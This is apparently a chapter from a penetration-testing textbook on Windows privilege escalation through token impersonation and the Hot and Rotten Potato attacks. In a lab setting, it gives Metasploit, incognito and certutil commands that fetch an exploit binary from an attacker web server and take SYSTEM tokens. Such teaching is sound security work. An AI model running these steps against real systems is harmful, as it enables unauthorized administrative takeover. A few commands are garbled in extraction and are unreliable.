Now that you have got your hands dirty with the privilege escalation process on Windows, we can begin exploring other attack vectors that can be exploited to elevate our privileges. In this chapter, we will be taking a closer look at Windows access tokens, how they work, and how they can be leveraged to elevate our privileges through impersonation attacks.
The practical demonstrations in this chapter will primarily be focused on how to enumerate privileges on a system to determine whether it is vulnerable to impersonation attacks and how to generate or impersonate a privileged Windows access token that can be used to elevate our privileges.
We will also look at how to use various built-in meterpreter modules to automate the token impersonation process on a target system.
In this chapter, we're going to cover the following main topics:
To follow along with the demonstrations in this chapter, you will need to ensure that you meet the following technical requirements:
You can view this chapter's code in action here: https://bit.ly/3kWPSch
We took a brief look at how Windows access tokens work in the first chapter of the book and should have a general idea of how they can be abused to elevate privileges. This section will dive deeper into how they work and their role in the authentication process on Windows.
The first step is to revisit the function Windows access tokens play in authentication, how they work, and the various security levels that can be assigned to tokens.
Windows access tokens are a core element of the authentication process on Windows and are created and managed by the Local Security Authority Subsystem Service (LSASS).
A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookie that provides users with access to a system or network without having to provide credentials each time a process is started or a system resource is accessed.
Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and includes the identity and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by a user will inherit a copy of the access token from their creator and will run under the privileges of the same access token.
Given the fact that access tokens are used to provide specific access to users based on their privileges, Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.
An access token will typically be assigned one of the following security levels:
The two main security levels we will be encountering and leveraging are impersonate and delegate as they can be abused to elevate our privileges on a system.
Impersonate-level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons.
Impersonate-level tokens can be used to impersonate a token on the local system and not on any external systems that utilize the token.
Delegate-level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols such as Remote Desktop Protocol (RDP).
Delegate-level tokens pose the largest threat as they can be used to impersonate tokens on any system.
Now that we have an idea of how access tokens work and the various security levels associated with them, we can look at how they are abused to elevate privileges on a system.
The process of abusing tokens to elevate privileges on a system will primarily depend on the privileges assigned to the account that has been exploited to gain initial access.
In order to fully understand how to leverage the delegate and impersonate access tokens to elevate our privileges, we will need to explore the specific Windows privileges that are required to perform an impersonation attack.
The following are the privileges that are required for a successful impersonation attack:
More information regarding the specific Windows privileges and their potential impact in terms of impersonation attacks can be found here: https://github.com/gtworek/Priv2Admin.
Now that we understand how access tokens work on Windows, the various security levels associated with tokens, and the specific privileges required to launch a successful impersonation attack, we can begin the token impersonation process by taking a look at how to enumerate the privileges associated with our account on the target system.
In this chapter, we will be using Windows 7 SP1 virtual machine that we had set up in our virtual hacking lab.
We can now begin the process of enumerating privileges in order to determine whether we can perform an impersonation attack on the target.
To perform the privilege enumeration process, you will need to ensure that you have access to your target system either through a command shell or a meterpreter session. We will be taking a look at how to use various techniques that will apply to both methods of access. To begin the privilege enumeration process, follow the outlined procedures:
getuid
If you do not have access to the target via a meterpreter session, you can run the following command in the command shell:
whoami
As highlighted in the following screenshot, this will output the current user you are logged in as; in this case, we are logged in as a regular user:
getprivs
Alternatively, if you are utilizing a command shell, you can run the following Windows command in the command prompt:
whoami /priv
This will output a list of privileges assigned to the user account. We are primarily interested in identifying the following privileges that can be abused:
As highlighted in the preceding screenshot, we are able to identify the SeImpersonatePrivilege privilege. This privilege can be used to create a process under the security context of another user typically with administrative privileges:
As highlighted in the preceding screenshot, the Windows command will also provide information regarding the privilege; in this case, the SeImpersonatePrivilege privilege allows us to impersonate a client after authentication.
If the account does not have any of the privileges outlined here, you will not be able to perform an impersonation attack successfully. As a result, you will need to identify another potential attack vector.
We have now been able to successfully enumerate the privileges of the user account we are logged in as and can begin performing the token impersonation attack.
Token impersonation attacks leverage specific Windows privileges such as SeImpersonatePrivilege to obtain an access token with administrative privileges that we can use to impersonate in order to elevate our privileges.
This process will depend on the version of Windows you are targeting and can be performed through various techniques.
The technique we will be focusing on is known as the Potato attack. This attack has some variations that alter the exploitation process; however, the core principles of the exploitation process remain the same. To fully understand how to successfully impersonate tokens, we will need to take a closer look at how the Potato attack works.
The Potato attack is the name given to a Windows privilege escalation technique that exploits known issues in Windows such as the NTLM relay (specifically the HTTP – SMB relay), NetBIOS Name Service (NBNS) spoofing, WPAD, and Windows Update.
This technique allows attackers to elevate privileges on a Windows system from an account with the lowest privileges to an account with the highest privilege available, namely NT AUTHORITY/SYSTEM.
Because the exploitation process involves leveraging NTLM authentication, we need to get an understanding of how NTLM authentication works.
NT LAN Manager (NTLM) is a collection of authentication protocols utilized in Windows to facilitate authentication between computers. The authentication process involves the use of a valid username and password to authenticate successfully.
NTLM authentication operates under the client-server model of communication and involves a handshake process similar to the TCP 3-way handshake.
The authentication process utilizes three types of messages that are used to establish successful authentication:
The following figure illustrates the NTLM authentication process as a whole and the handshake process between the client and the server:
Now that we have a basic idea of how NTLM authentication works, let's explore the steps involved in the handshake process in greater detail:
The nature of the NTLM authentication handshake makes it vulnerable to man-in-the-middle attacks, which can be used to perform impersonation attacks.
You should now have an understanding of how NTLM authentication works, and we can now explore the various variations of the Potato attack that can be used.
The Hot Potato attack involves various steps that leverage the NTLM relay (specifically the HTTP=>SMB relay), WPAD, NetBIOS name server, spoofing, and Windows Update. The attack works as follows:
More information regarding the Hot Potato attack can be found here: https://foxglovesecurity.com/2016/01/16/hot-potato/
The Rotten Potato attack involves three main steps that leverage the NTLM relay to negotiate a security token for NT AUTHORITY/SYSTEM. The attack works as follows:
The Rotten Potato attack is an improved variation of the Hot Potato attack, which also leverages the NTLM relay, NBNS spoofing, WPAD, and Windows Update. The Rotten Potato attack is much more efficient and provides a greater degree of success as it does not rely on the Windows Update process.
More information regarding the Rotten Potato attack can be found here: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/.
Now that we understand how the various Potato attacks work, we can begin the token impersonation process on our target system.
In this section, we will be exploring the various tools and techniques that can be utilized to perform token impersonation via the Potato attack. As mentioned in the previous section, the success of Potato attacks will depend on the version of Windows the target is running and whether services such as WPAD are running or if NTLMv2 hashes are being used.
We can begin the process by following the outlined procedures:
./windows-exploit-suggester.py --database <Database>.xlsx --systeminfo <Systeminfo>.txt
As highlighted in the following screenshot, this will output a list of potential privilege escalation vulnerabilities, in this case, we are only interested in Potato exploits that can lead to privilege escalation:
In this example, we can identify a potential privilege escalation attack vector that can be exploited through the Hot Potato and Rotten Potato attacks:
As shown in the preceding screenshot, additional research regarding the MS16-075 exploit reveals a Metasploit module that we can use to perform the Potato attack automatically.
use exploit/windows/local/ms16_075_reflection
Ensure that you have put your meterpreter session in the background before loading the module.
show options
You will also need to specify the default shell to be used; in this case, we will be utilizing a meterpreter shell compatible with x64-based operating systems. This can be done by running the following command:
set payload /windows/x64/meterpreter/reverse_tcp
As highlighted in the following screenshot, the module options you will need to modify are LHOST, LPORT, and the SESSION ID. Additionally, the module options should also reflect the default shell we had specified in the previous step:
run
If the exploit is successful, you should get a new meterpreter session as highlighted in the following screenshot:
load incognito
If the module is successfully loaded, you should get a message similar to the one highlighted in the following screenshot:
Note
incognito is a built-in meterpreter module that was originally a standalone application that allows you to impersonate user tokens after successful exploitation.
list_tokens -u
As highlighted in the following screenshot, this will list all available user tokens that we can impersonate to elevate our privileges. In this case, we are able to identify the NT AUTHORITY/SYSTEM access token with the delegate security level:
impersonate_token "NT AUTHORITYSYSTEM"
If the impersonation process is successful, you should receive a message similar to the one highlighted in the following screenshot:
getuid
As highlighted in the following screenshot, we should now have NT AUTHORITY/SYSTEM privileges on the target system and should have successfully elevated our privileges:
Now that we have learned how to perform impersonation attacks automatically using Metasploit modules, we can also explore how to perform Potato attacks manually.
The manual escalation process will entail the use of exploit binaries that require manual compilation, transfer, and execution. After executing the exploit binary, we will utilize meterpreter modules such as incognito to list the available tokens and impersonate a privileged access token to elevate our privileges:
./windows-exploit-suggester.py --database <Database>.xlsx --systeminfo <Systeminfo>.txt
As highlighted in the following screenshot, this will output a list of potential privilege escalation vulnerabilities. In this case, we are only interested in Potato exploits that can lead to privilege escalation:
In this example, we can identify a potential privilege escalation attack vector that can be exploited through a Rotten Potato attack.
We can navigate to the GitHub reference URL outlined in Figure 6.13 to learn more about the exploit and how it can be used.
As highlighted in the following screenshot, the GitHub repository provides us with the exploit source code and a pre-compiled executable that we can use:
The GitHub repository also provides us with usage procedures for the exploit and the requirements, as highlighted in the following screenshot:
In this case, we will be using the pre-compiled executable; it is, however, recommended to analyze the source code and compile it manually to modify the parameters based on your requirements and avoid any security issues.
To set up a web server on our Kali virtual machine, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the rottenpotato.exe binary is stored:
sudo python -m SimpleHTTPServer 80
Alternatively, you can also utilize the Python3 http.server module by running the following command:
sudo python3 -m http.server 80
As highlighted in the following screenshot, SimpleHTTPServer will serve the files in the directory on the Kali virtual machine IP address on port 80:
To download the rottenpotato.exe binary onto the target system, we can utilize the certutil utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the current user's desktop as illustrated in the following screenshot:
We can now use the certutil utility to download the binary from the Kali virtual machine to our target system. This can be done by running the following command on the target system:
certutil -urlcache -f http://<KALI-VM-IP>/rottenpotato.exe rottenpotato.exe
Alternatively, we can also use meterpreter to upload the rottenpotato.exe binary. This can be done by running the following command:
upload /<BINARY-LOCATION>/rottenpotato.exe
load incognito
shell
After launching a shell session on the target, we can execute the rottenpotato.exe binary by running the following command:
. ottenpotato.exe
If the exploit is successful, you should receive a message like the one highlighted in the following screenshot:
list_tokens -u
As highlighted in the following screenshot, this will list out all available user tokens that we can impersonate to elevate our privileges. In this case, we are able to identify the NT AUTHORITY/SYSTEM access token with the delegate security level:
impersonate_token "NT AUTHORITYSYSTEM"
If the impersonation process is successful, you should receive a message like the one highlighted in the following screenshot:
getuid
As highlighted in the following screenshot, we should now have NT AUTHORITY/SYSTEM privileges on the target system and should have successfully elevated our privileges:
We have now been able to elevate our privileges through token impersonation attacks both through Metasploit modules and manually through exploit binaries.
In this chapter, we got started with understanding how Windows access tokens work and the various security levels associated with them. We then looked at how to enumerate privileges on our target system through the use of automated and manual tools in order to identify whether it is vulnerable to a token impersonation attack. We then ended the chapter by taking an in-depth look at how to perform token impersonation attacks via the Potato attack both automatically and manually.
In the next chapter, we will look at how to search for stored credentials and hashes to elevate our privileges.
3.145.163.58